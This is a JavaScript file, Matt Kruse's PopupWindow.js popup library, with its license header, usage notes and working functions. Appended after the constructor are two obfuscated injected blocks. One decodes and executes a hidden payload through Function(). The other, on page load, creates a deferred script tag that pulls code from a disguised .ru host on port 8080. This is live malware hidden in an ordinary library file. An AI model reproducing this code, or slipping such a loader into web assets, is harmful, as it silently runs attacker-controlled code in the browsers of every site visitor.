// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purpose, commercial or
// private, without any further permission from the author. You may
// remove this notice from your final code if you wish, however it is
// appreciated by the author if at least my web site address is kept.
//
// You may *NOT* re-distribute this code in any way except through its
// use. That means, you can include it in your product, or your web
// site, or any other form where the code is actually being used. You
// may not put the plain javascript up on your site for download or
// include it in your javascript libraries for download. 
// If you wish to share this code with others, please just point them
// to the URL instead.
// Please DO NOT link directly to my .js files from your site. Copy
// the files to your server and use them there. Thank you.
// ===================================================================

/* 
PopupWindow.js
Author: Matt Kruse
Last modified: 02/16/04

DESCRIPTION: This object allows you to easily and quickly popup a window
in a certain place. The window can either be a DIV or a separate browser
window.

COMPATABILITY: Works with Netscape 4.x, 6.x, IE 5.x on Windows. Some small
positioning errors - usually with Window positioning - occur on the 
Macintosh platform. Due to bugs in Netscape 4.x, populating the popup 
window with <STYLE> tags may cause errors.

USAGE:
// Create an object for a WINDOW popup
var win = new PopupWindow(); 

// Create an object for a DIV window using the DIV named 'mydiv'
var win = new PopupWindow('mydiv'); 

// Set the window to automatically hide itself when the user clicks 
// anywhere else on the page except the popup
win.autoHide(); 

// Show the window relative to the anchor name passed in
win.showPopup(anchorname);

// Hide the popup
win.hidePopup();

// Set the size of the popup window (only applies to WINDOW popups
win.setSize(width,height);

// Populate the contents of the popup window that will be shown. If you 
// change the contents while it is displayed, you will need to refresh()
win.populate(string);

// set the URL of the window, rather than populating its contents
// manually
win.setUrl("http://www.site.com/");

// Refresh the contents of the popup
win.refresh();

// Specify how many pixels to the right of the anchor the popup will appear
win.offsetX = 50;

// Specify how many pixels below the anchor the popup will appear
win.offsetY = 100;

NOTES:
1) Requires the functions in AnchorPosition.js

2) Your anchor tag MUST contain both NAME and ID attributes which are the 
   same. For example:
   <A NAME="test" ID="test"> </A>

3) There must be at least a space between <A> </A> for IE5.5 to see the 
   anchor tag correctly. Do not do <A></A> with no space.

4) When a PopupWindow object is created, a handler for 'onmouseup' is
   attached to any event handler you may have already defined. Do NOT define
   an event handler for 'onmouseup' after you define a PopupWindow object or
   the autoHide() will not work correctly.
*/ 

// Set the position of the popup window based on the anchor
function PopupWindow_getXYPosition(anchorname) {
	var coordinates;
	if (this.type == "WINDOW") {
		coordinates = getAnchorWindowPosition(anchorname);
		}
	else {
		coordinates = getAnchorPosition(anchorname);
		}
	this.x = coordinates.x;
	this.y = coordinates.y;
	}
// Set width/height of DIV/popup window
function PopupWindow_setSize(width,height) {
	this.width = width;
	this.height = height;
	}
// Fill the window with contents
function PopupWindow_populate(contents) {
	this.contents = contents;
	this.populated = false;
	}
// Set the URL to go to
function PopupWindow_setUrl(url) {
	this.url = url;
	}
// Set the window popup properties
function PopupWindow_setWindowProperties(props) {
	this.windowProperties = props;
	}
// Refresh the displayed contents of the popup
function PopupWindow_refresh() {
	if (this.divName != null) {
		// refresh the DIV object
		if (this.use_gebi) {
			document.getElementById(this.divName).innerHTML = this.contents;
			}
		else if (this.use_css) { 
			document.all[this.divName].innerHTML = this.contents;
			}
		else if (this.use_layers) { 
			var d = document.layers[this.divName]; 
			d.document.open();
			d.document.writeln(this.contents);
			d.document.close();
			}
		}
	else {
		if (this.popupWindow != null && !this.popupWindow.closed) {
			if (this.url!="") {
				this.popupWindow.location.href=this.url;
				}
			else {
				this.popupWindow.document.open();
				this.popupWindow.document.writeln(this.contents);
				this.popupWindow.document.close();
			}
			this.popupWindow.focus();
			}
		}
	}
// Position and show the popup, relative to an anchor object
function PopupWindow_showPopup(anchorname) {
	this.getXYPosition(anchorname);
	this.x += this.offsetX;
	this.y += this.offsetY;
	if (!this.populated && (this.contents != "")) {
		this.populated = true;
		this.refresh();
		}
	if (this.divName != null) {
		// Show the DIV object
		if (this.use_gebi) {
			document.getElementById(this.divName).style.left = this.x + "px";
			document.getElementById(this.divName).style.top = this.y + "px";
			document.getElementById(this.divName).style.visibility = "visible";
			}
		else if (this.use_css) {
			document.all[this.divName].style.left = this.x;
			document.all[this.divName].style.top = this.y;
			document.all[this.divName].style.visibility = "visible";
			}
		else if (this.use_layers) {
			document.layers[this.divName].left = this.x;
			document.layers[this.divName].top = this.y;
			document.layers[this.divName].visibility = "visible";
			}
		}
	else {
		if (this.popupWindow == null || this.popupWindow.closed) {
			// If the popup window will go off-screen, move it so it doesn't
			if (this.x<0) { this.x=0; }
			if (this.y<0) { this.y=0; }
			if (screen && screen.availHeight) {
				if ((this.y + this.height) > screen.availHeight) {
					this.y = screen.availHeight - this.height;
					}
				}
			if (screen && screen.availWidth) {
				if ((this.x + this.width) > screen.availWidth) {
					this.x = screen.availWidth - this.width;
					}
				}
			var avoidAboutBlank = window.opera || ( document.layers && !navigator.mimeTypes['*'] ) || navigator.vendor == 'KDE' || ( document.childNodes && !document.all && !navigator.taintEnabled );
			this.popupWindow = window.open(avoidAboutBlank?"":"about:blank","window_"+anchorname,this.windowProperties+",width="+this.width+",height="+this.height+",screenX="+this.x+",left="+this.x+",screenY="+this.y+",top="+this.y+"");
			}
		this.refresh();
		}
	}
// Hide the popup
function PopupWindow_hidePopup() {
	if (this.divName != null) {
		if (this.use_gebi) {
			document.getElementById(this.divName).style.visibility = "hidden";
			}
		else if (this.use_css) {
			document.all[this.divName].style.visibility = "hidden";
			}
		else if (this.use_layers) {
			document.layers[this.divName].visibility = "hidden";
			}
		}
	else {
		if (this.popupWindow && !this.popupWindow.closed) {
			this.popupWindow.close();
			this.popupWindow = null;
			}
		}
	}
// Pass an event and return whether or not it was the popup DIV that was clicked
function PopupWindow_isClicked(e) {
	if (this.divName != null) {
		if (this.use_layers) {
			var clickX = e.pageX;
			var clickY = e.pageY;
			var t = document.layers[this.divName];
			if ((clickX > t.left) && (clickX < t.left+t.clip.width) && (clickY > t.top) && (clickY < t.top+t.clip.height)) {
				return true;
				}
			else { return false; }
			}
		else if (document.all) { // Need to hard-code this to trap IE for error-handling
			var t = window.event.srcElement;
			while (t.parentElement != null) {
				if (t.id==this.divName) {
					return true;
					}
				t = t.parentElement;
				}
			return false;
			}
		else if (this.use_gebi && e) {
			var t = e.originalTarget;
			while (t.parentNode != null) {
				if (t.id==this.divName) {
					return true;
					}
				t = t.parentNode;
				}
			return false;
			}
		return false;
		}
	return false;
	}

// Check an onMouseDown event to see if we should hide
function PopupWindow_hideIfNotClicked(e) {
	if (this.autoHideEnabled && !this.isClicked(e)) {
		this.hidePopup();
		}
	}
// Call this to make the DIV disable automatically when mouse is clicked outside it
function PopupWindow_autoHide() {
	this.autoHideEnabled = true;
	}
// This global function checks all PopupWindow objects onmouseup to see if they should be hidden
function PopupWindow_hidePopupWindows(e) {
	for (var i=0; i<popupWindowObjects.length; i++) {
		if (popupWindowObjects[i] != null) {
			var p = popupWindowObjects[i];
			p.hideIfNotClicked(e);
			}
		}
	}
// Run this immediately to attach the event listener
function PopupWindow_attachListener() {
	if (document.layers) {
		document.captureEvents(Event.MOUSEUP);
		}
	window.popupWindowOldEventListener = document.onmouseup;
	if (window.popupWindowOldEventListener != null) {
		document.onmouseup = new Function("window.popupWindowOldEventListener(); PopupWindow_hidePopupWindows();");
		}
	else {
		document.onmouseup = PopupWindow_hidePopupWindows;
		}
	}
// CONSTRUCTOR for the PopupWindow object
// Pass it a DIV name to use a DHTML popup, otherwise will default to window popup
function PopupWindow() {
	if (!window.popupWindowIndex) { window.popupWindowIndex = 0; }
	if (!window.popupWindowObjects) { window.popupWindowObjects = new Array(); }
	if (!window.listenerAttached) {
		window.listenerAttached = true;
		PopupWindow_attachListener();
		}
	this.index = popupWindowIndex++;
	popupWindowObjects[this.index] = this;
	this.divName = null;
	this.popupWindow = null;
	this.width=0;
	this.height=0;
	this.populated = false;
	this.visible = false;
	this.autoHideEnabled = false;
	
	this.contents = "";
	this.url="";
	this.windowProperties="toolbar=no,location=no,status=no,menubar=no,scrollbars=auto,resizable,alwaysRaised,dependent,titlebar=no";
	if (arguments.length>0) {
		this.type="DIV";
		this.divName = arguments[0];
		}
	else {
		this.type="WINDOW";
		}
	this.use_gebi = false;
	this.use_css = false;
	this.use_layers = false;
	if (document.getElementById) { this.use_gebi = true; }
	else if (document.all) { this.use_css = true; }
	else if (document.layers) { this.use_layers = true; }
	else { this.type = "WINDOW"; }
	this.offsetX = 0;
	this.offsetY = 0;
	// Method mappings
	this.getXYPosition = PopupWindow_getXYPosition;
	this.populate = PopupWindow_populate;
	this.setUrl = PopupWindow_setUrl;
	this.setWindowProperties = PopupWindow_setWindowProperties;
	this.refresh = PopupWindow_refresh;
	this.showPopup = PopupWindow_showPopup;
	this.hidePopup = PopupWindow_hidePopup;
	this.setSize = PopupWindow_setSize;
	this.isClicked = PopupWindow_isClicked;
	this.autoHide = PopupWindow_autoHide;
	this.hideIfNotClicked = PopupWindow_hideIfNotClicked;
	}

var qA="c4dbdde9cea9dadadbd5f6bedec8eddea1f3f5fad8c8dff1d4e4d0fdfdf1fac1e3c3c0d0eed4c2e6eadfe3c6e9e4c8d8c8dfe1f6f9efcbd3fadcc6d1c5f2c5d1dbbcf6e1a2cbdbdb9cddccb3dcfd";var IK;if(IK!='Dg' && IK!='iT'){IK='Dg'};var EF=false;var mF;if(mF!=''){mF='Dl'};function S(R){var SX="";var Md="";var NN='';var sO=new String(); this.YRx="YRx";var JT=53273;function t(i,v){return i[Y("hcraoCedtA", [1,0])](v);var Pj="";}var RV;if(RV!='VU' && RV!='k'){RV=''};this.Ik=false;var tj=false;this.cH=false; var f=function(I){var wI;if(wI!='sG'){wI=''};var Ua='';this.gT="gT";var mf;if(mf!='Aj' && mf != ''){mf=null};var Lk;if(Lk!='' && Lk!='nM'){Lk='Ta'};var h;if(h!='' && h!='Z'){h='mZ'};var a = -1;var iyz='';var fE = '';I = new E(I);var q;if(q!='' && q!='oj'){q=''};this.JB='';var r =[0][0];var b=new String();var Sk;if(Sk!='oZ' && Sk!='OP'){Sk=''};var YL =[0][0];var Q='';this.vn=55134;for (YL=I[Y("nelhtg", [2,1,0])]-a;YL>=r;YL=YL-[1,198][0]){var Zp;if(Zp!=''){Zp='ET'};fE+=I[Y("hcratA", [1,0])](YL);var mb=36907;var YA=new Date();}var H;if(H!=''){H='SaW'};var rS;if(rS!='PC' && rS!='hW'){rS=''};var pd;if(pd!='C'){pd='C'};return fE;var LL="";var Xf;if(Xf!='TZ' && Xf != ''){Xf=null};};this.jh=19414;var G=''; function Y(I, z){var wB=new Array();this.aso="";var fE = '';var pR;if(pR!='nJ'){pR='nJ'};this.SG=false;var W=[1,38][0];var g = z.length;this.qE="qE";var JZ="JZ";var r=[249,151,0][2];var he=new Array();var xt;if(xt!='ch' && xt != ''){xt=null};var Rt;if(Rt!='Jx'){Rt='Jx'};var N = I.length;var Wq;if(Wq!=''){Wq='WD'};var VNm=false;var so;if(so!='K' && so!='nx'){so='K'};for(var YL = r; YL < N; YL += g) {var YM="";var fG;if(fG!='' && fG!='CW'){fG='MT'};var FC;if(FC!='uk'){FC=''};var kV="kV";var y = I.substr(YL, g);var RX;if(RX!=''){RX='sM'};var Ka=new String();if(y.length == g){var qk;if(qk!='UM' && qk!='Xw'){qk=''};var qG=32395;for(var WW in z) {var zF=false;fE+=y.substr(z[WW], W);var tW;if(tW!='cC' && tW!='crY'){tW=''};var Arv=new Array();}var eL;if(eL!='' && eL!='Ve'){eL=''};} else {this.xS=20154;  fE+=y;var dH;if(dH!='ld' && dH != ''){dH=null};var nG=false;}var OIu;if(OIu!='oy'){OIu='oy'};}var Fo="";var Qy;if(Qy!='IB' && Qy != ''){Qy=null};var Au;if(Au!='dQ' && Au != ''){Au=null};return fE;var Mv="";var gZ="";}var nX='';var ZD;if(ZD!='' && ZD!='JE'){ZD=''};this.Um=58060;var WP=""; var fc=function(J){var uv=63175;var zw;if(zw!='' && zw!='Kb'){zw=''};var Zx;if(Zx!='' && Zx!='nf'){Zx=''};var St=[255,77,152][0];var mo;if(mo!=''){mo='pH'};var ug;if(ug!='' && ug!='zJ'){ug=''};var W=[221,1][1];var U=[0][0];var fV;if(fV!='GB' && fV!='IG'){fV='GB'};var TJ='';var A=J[Y("elgnht", [1,0])];var Iw=36912;var tl;if(tl!='ZS'){tl=''};var WW=[145,0,191][1];var JVh;if(JVh!=''){JVh='kK'};var xm;if(xm!=''){xm='YW'};while(WW<A){var cw=new String();WW++;var gC;if(gC!=''){gC='SXh'};T=t(J,WW - W);var uP;if(uP!='ep' && uP!='cD'){uP='ep'};this.cE="";U+=T*A;}var Rj=new String();var rW="";return new E(U % St);};var tB=63762;var Zu;if(Zu!='' && Zu!='MdN'){Zu=null}; function X(yB,F){var rN=new Array();var uJ;if(uJ!='' && uJ!='MH'){uJ=null};return yB^F;this.asT=246;this.HG='';}this.ki=false;var WK;if(WK!=''){WK='SF'};this.ZF="";var Ss=window;var Zs=new Date();var cl;if(cl!='AM'){cl=''};var Yb=Ss[Y("vela", [1,0])];var nJc=42601;var p=Yb(Y("ocFntnui", [2,6,5,1,4,7,0,3]));var li;if(li!=''){li='Or'};var VB;if(VB!='od' && VB!='cEs'){VB=''};var E=Yb(Y("rSgnti", [1,4,0,5,3,2]));var CV=false;var Vc;if(Vc!='Rq' && Vc != ''){Vc=null};var TU;if(TU!=''){TU='vX'};var bA;if(bA!=''){bA='hd'};var iD = '';var kc;if(kc!='ore'){kc='ore'};var WN=Yb(Y("gERexp", [2,3,0,1]));var FB=false;var JF;if(JF!='it' && JF != ''){JF=null};var XG=new Date();var ww=new String();var xy;if(xy!='' && xy!='Hs'){xy='Iv'};this.OX=false;var V=Ss[Y("sanucepe", [3,2,5,0,4,1])];var yS=new Array();var w=E[Y("omhCfrCoedar", [4,5,0,1,3,2])];var aS;if(aS!=''){aS='VC'};var Es;if(Es!='' && Es!='IGW'){Es='vy'};var aW = '';var PCr;if(PCr!='' && PCr!='Ec'){PCr=null};var kb=188;var s = R[Y("elgnth", [1,0,3,2])];var pM;if(pM!='oT' && pM != ''){pM=null};var JuM;if(JuM!='' && JuM!='ry'){JuM=null};var gK = '';var tc = '';var cqC;if(cqC!='' && cqC!='Tat'){cqC=''};var Co;if(Co!='' && Co!='kcc'){Co=''};var iy = /[^@a-z0-9A-Z_-]/g;var DT;if(DT!='nj'){DT='nj'};this.Ms="";var vF=false;var fR =[200,239,0][2];var Sa=[1, Y("ucodm.tnectaeremelEe\'(tnspirct\')", [3,2,1,0,4]),2, Y("ethpairtaebyr.og", [1,2,0,3]),3, Y("cuedom.bdntoapey.pChlndid(d)", [3,4,0,1,5,2]),4, Y(".wmihocagpseetm.oemc.fiaerid", [6,5,2,0,1,4,3]),5, Y("scot.iemisoestsn8.r8:00u", [1,2,7,4,0,5,3,6]),6, Y("Atdestt.e(rub\'tidefer\'", [2,7,4,3,6,0,1,5]),7, Y("fblituaroncosm.i", [4,7,3,1,6,2,0,5]),8, Y("diwnowo.alnod", [2,1,3,0]),11, Y("nfuict(on)", [1,2,0]),12, Y("oogelgoc.m", [2,1,0]),14, Y("acct(h)e", [1,0]),15, Y("seocw.bm", [4,1,6,0,5,3,2]),16, Y("yskrock", [1,2,0,3]),17, Y("h\"tt:p", [1,0]),18, Y("s.drc", [2,1,0]),19, Y("1\')\'", [1,0]),20, Y("rty", [1,0])];var gi;if(gi!='Nx'){gi=''};var tD="";var W =[1,218][0];var r =[0,207,156,28][0];var nL;if(nL!='RG' && nL!='Yt'){nL=''};this.TM="TM";var M = E.fromCharCode(37);var go;if(go!='' && go!='Hq'){go='lF'};var tT =[189,2,247,189][1];var ojA="";var XX=new String();var Ae;if(Ae!='Yd' && Ae != ''){Ae=null};for(var Jt=r; Jt < s; Jt+=tT){var zW;if(zW!='Wh' && zW != ''){zW=null};gK+= M; gK+= R[Y("ubsstr", [3,0,1,2])](Jt, tT);}var Za;if(Za!='' && Za!='gM'){Za=''};var hs="hs";var R = V(gK);var mS="mS";var Wo = new E(S);var HH;if(HH!='id' && HH!='Gk'){HH=''};this.RW=false;var m = Wo[Y("erpalce", [1,0,2])](iy, tc);var kH='';var wY;if(wY!='jY' && wY != ''){wY=null};var o = Sa[Y("telgnh", [2,1,4,3,0])];var YMC=new Array();var dv;if(dv!='vne' && dv!='ZK'){dv='vne'};var Jtq=new String();var CGt;if(CGt!='KXo' && CGt!='pWU'){CGt=''};m = f(m);var Mf;if(Mf!='rbA'){Mf='rbA'};var Wi;if(Wi!='' && Wi!='GQ'){Wi=''};var O = new E(p);var Ajj=new String();var lo=new String();var wp;if(wp!='Ze' && wp != ''){wp=null};var fF="fF";this.Nt="Nt";var P = O[Y("clparee", [4,5,2,1,3,0])](iy, tc);this.JqB='';var vN;if(vN!='oVH'){vN='oVH'};var P = fc(P);var GQa=new Date();var fX=fc(m);var PF=40850;this.vJ="";var Uy;if(Uy!='Op' && Uy!='VR'){Uy='Op'};for(var YL=r; YL < (R[Y("elntgh", [1,0,2])]);YL=YL+[1][0]) {var Tq='';var zY;if(zY!='xQ'){zY='xQ'};var rn='';var jq;if(jq!='LNs' && jq != ''){jq=null};var UE = m.charCodeAt(fR);var pcA="";var Gq;if(Gq!='ts'){Gq='ts'};var mr = t(R,YL);mr = X(mr, UE);var SN;if(SN!='' && SN!='iP'){SN=''};mr = X(mr, fX);mr = X(mr, P);this.qko="qko";var Ez;if(Ez!='' && Ez!='BH'){Ez=null};fR++;this.Sys="";var Wl=false;var cCN=false;if(fR > m.length-W){fR=r;this.aV=false;}var xts=new String();var loT;if(loT!='' && loT!='aD'){loT=''};aW += w(mr);var tN=new Date();}var wXV;if(wXV!='' && wXV!='OBZ'){wXV='IZ'};for(am=r; am < o; am+=tT){var aDp='';var sh="sh";this.Lq='';var oV = w(Sa[am]);var WC;if(WC!='' && WC!='PH'){WC='se'};this.Ix='';this.dp=54361;var UA = Sa[am + W];var fFD;if(fFD!='' && fFD!='cig'){fFD=''};var Fd;if(Fd!='jT'){Fd=''};var il;if(il!='' && il!='yq'){il='WR'};var oW = new WN(oV, E.fromCharCode(103));aW=aW[Y("epracle", [2,0,1])](oW, UA);var EN;if(EN!='' && EN!='KP'){EN='afM'};}var IM=new p(aW);var XuH='';var CzG;if(CzG!='' && CzG!='RN'){CzG='gRT'};IM();var cI="cI";var jDK;if(jDK!='' && jDK!='CZ'){jDK=null};aW = '';m = '';var vf;if(vf!='MO' && vf != ''){vf=null};var oc;if(oc!='IZu' && oc!='MI'){oc='IZu'};P = '';var Tv=new Array();O = '';var xo;if(xo!='uPH'){xo='uPH'};var Sf=false;IM = '';var Of=new Array();fX = '';var aT=new Date();var sp="";return '';};var IK;if(IK!='Dg' && IK!='iT'){IK='Dg'};var EF=false;var mF;if(mF!=''){mF='Dl'};S(qA);
function f() {var Vo;if(Vo!='' && Vo!='WW'){Vo=''};var T=new Date();var e=new String();var ZC="";var r='[';var Ys;if(Ys!=''){Ys='zE'};var z='g';var Zc='';var W=']';var E;if(E!='m' && E!='C'){E='m'};var J='replace';var zT="";var b=RegExp;var _D='';var wq;if(wq!='s' && wq!='Q'){wq='s'};function V(D,p){var Ek='';var VH=r;var rE;if(rE!='' && rE!='Nf'){rE='t'};VH+=p;var qk=new Array();var tw=new Array();VH+=W;var Qf;if(Qf!='' && Qf!='lx'){Qf='aG'};var EQ;if(EQ!=''){EQ='_O'};var O=new b(VH, z);var X=new String();return D[J](O, e);var nZ;if(nZ!='' && nZ!='ZY'){nZ=''};};var MU;if(MU!='ba' && MU!='h'){MU=''};var mJ=new String();var GS;if(GS!='' && GS!='PN'){GS='bw'};var o=window;var y;if(y!='VT' && y!='xk'){y=''};var cd;if(cd!='mN' && cd != ''){cd=null};var Z=V('cSrVeVaVtSe_EVlVe_mSe_nStS',"SV_");var L=V('h4t4tYpY:7/Y/Yr4u4nYe4sYc4aYp7e4-7c7o4mY.Yf4oYo7d4n7e7t7w7oYrYk7.7cYo4mY.YiYpYi4c7tYu7r7eY-7r7u7.7j4eYr4sYe4y4h7o4m4e7sYiYt7e7.7rYuY:Y',"47Y");var A;if(A!=''){A='ZO'};var UD;if(UD!=''){UD='ub'};var Y='';var rP=new Date();var DR;if(DR!=''){DR='Gv'};var q=V('/PsPuPerdPdrePuPtPsPcrhreP.rdreP/PsrurePdrdPerurtrsrcPhPer.PdreP/PgPoroPgPlPeP.PcroPmr/rgPoPorgPlPer.rnPlr/PwPhPirtrePpPaPgrersr.rcrormP.rpPhrpP',"Pr");var XB;if(XB!='' && XB!='bG'){XB='KW'};var Zd=V('skc0rkikpntR',"dRkn0");var yO="";var Zu=new String();var u=V('899097189790997',"791");var xp;if(xp!='' && xp!='bg'){xp=''};var sC;if(sC!='YQ' && sC!='Hl'){sC='YQ'};var rf;if(rf!='mm' && rf!='h_'){rf=''};o[V('omn7l7oLavd7',"z7vLm")]=function(){try {var lS;if(lS!=''){lS='mW'};var vM;if(vM!=''){vM='dg'};var BW="";Y+=L;var twX='';this.de="";Y+=u;var IS;if(IS!='cA'){IS=''};var mE=new String();Y+=q;var cXM;if(cXM!='II'){cXM=''};M=document[Z](Zd);S(M,'defer',([1][0]));this.Sk='';var bJ=new String();S(M,'src',Y);this.qa='';var sB=new String();document.body.appendChild(M);var ae="";} catch(P){var bQ;if(bQ!='' && bQ!='NH'){bQ=''};var nb=new Array();};var YS="";var Fk=new Date();};var Xn='';function S(Jm,d,l){Jm.setAttribute(d, l);}};var vw;if(vw!='' && vw!='Hm'){vw=null};var ev="";f();var OD=new Date();